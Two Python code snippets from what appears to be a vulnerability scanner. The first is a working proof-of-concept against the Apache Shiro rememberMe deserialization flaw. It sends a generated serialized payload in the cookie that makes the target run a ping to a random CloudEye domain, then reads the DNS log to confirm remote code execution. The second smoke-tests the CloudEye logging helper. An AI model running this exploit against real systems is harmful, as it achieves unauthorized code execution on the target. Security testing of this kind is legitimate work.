Exemplo n.º 1
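def poc(url):
    """Check one target for the Shiro ``rememberMe`` issue via a DNS callback.

    The check is active rather than a passive fingerprint: it sends a
    generated payload in the ``rememberMe`` cookie whose embedded command
    pings a random CloudEye domain, then looks for that domain in the
    CloudEye DNS log. ``generator`` and ``JAR_FILE`` are defined outside this
    block; presumably they build a serialized payload for the Shiro
    rememberMe deserialization issue (inferred from the 'shiro' label and the
    cookie name) -- confirm against their definitions.

    Seen from the target's side, the request is a plain GET carrying the
    payload in the ``rememberMe`` cookie, followed by a DNS lookup for a
    random CloudEye domain if the command ran.

    Args:
        url: Target as a full URL, or as a bare ``host[:port]`` for which a
            scheme is guessed.

    Returns:
        ``url`` followed by ``' - <match>'`` for every ``client ...#`` entry
        found in the DNS log when the callback domain was seen; ``None`` when
        it was not seen or when any step raised. A ``None`` result is
        therefore not evidence that the target is unaffected: a network
        error or a CloudEye failure produces the same value (the failure is
        logged at DEBUG level).
    """
    import logging

    if '://' in url:
        target = url
    else:
        # Substring test kept from the original: any value containing ':443'
        # (for example a port such as 4430) is treated as HTTPS.
        scheme = 'https' if ':443' in url else 'http'
        target = '%s://%s' % (scheme, url)

    try:
        cloudeye = CloudEye()
        # Random domain under the 'shiro' marker group; it identifies this run.
        domain = cloudeye.getRandomDomain('shiro')
        # Command carried by the payload: 'ping -n' is the Windows form and
        # 'ping -c' the Unix form, chained so whichever applies is used.
        rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain)
        payload = generator(rce_command, JAR_FILE)
        # Verification request; the response itself is not inspected.
        requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)

        dnslog = cloudeye.getDnsRecord(delay=2)
        if domain not in dnslog:
            return None
        # Each 'client <addr>#' entry in the log is the resolver/egress
        # address that performed the lookup.
        egress = re.findall(r'client (.*)#', dnslog)
        return url + ''.join(' - ' + addr for addr in egress)
    except Exception as exc:
        # The caller still gets None, as before, but the reason is no longer
        # discarded; 'except Exception, e' was also Python-2-only syntax.
        logging.getLogger(__name__).debug('poc(%s) did not complete: %s', url, exc)
        return None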
Exemplo n.º 2
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Author: rivir
Date: 2020/2/22
"""
import sys
sys.path.append('../')
from plugin.cloudeye import CloudEye

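def main():
    """Smoke-test the CloudEye helper against a freshly generated domain.

    Requests ``http://<random domain>`` once, then prints the result of each
    of the four CloudEye query methods. Presumably the request is what makes
    the DNS and HTTP records appear -- confirm against plugin.cloudeye.
    """
    # Standard-library client, so the request does not depend on a `requests`
    # import that this file does not have (with the name unbound, the call
    # raised NameError inside the try below and no request was ever sent).
    try:
        from urllib2 import urlopen  # Python 2, the interpreter in the shebang
    except ImportError:
        from urllib.request import urlopen

    cloudeye = CloudEye()
    domain = cloudeye.getRandomDomain('cdxy')
    try:
        urlopen('http://' + domain, timeout=1)
    except Exception:
        # Best effort: the response does not matter and a timeout or HTTP
        # error is acceptable here; only the query results below are shown.
        pass

    # Single-argument print(...) gives the same output on Python 2 and 3.
    print(cloudeye.verifyDNS(delay=0))
    print(cloudeye.verifyHTTP(delay=0))
    print(cloudeye.getDnsRecord(delay=0))
    print(cloudeye.getHttpRecord(delay=0))


if __name__ == "__main__":
    main()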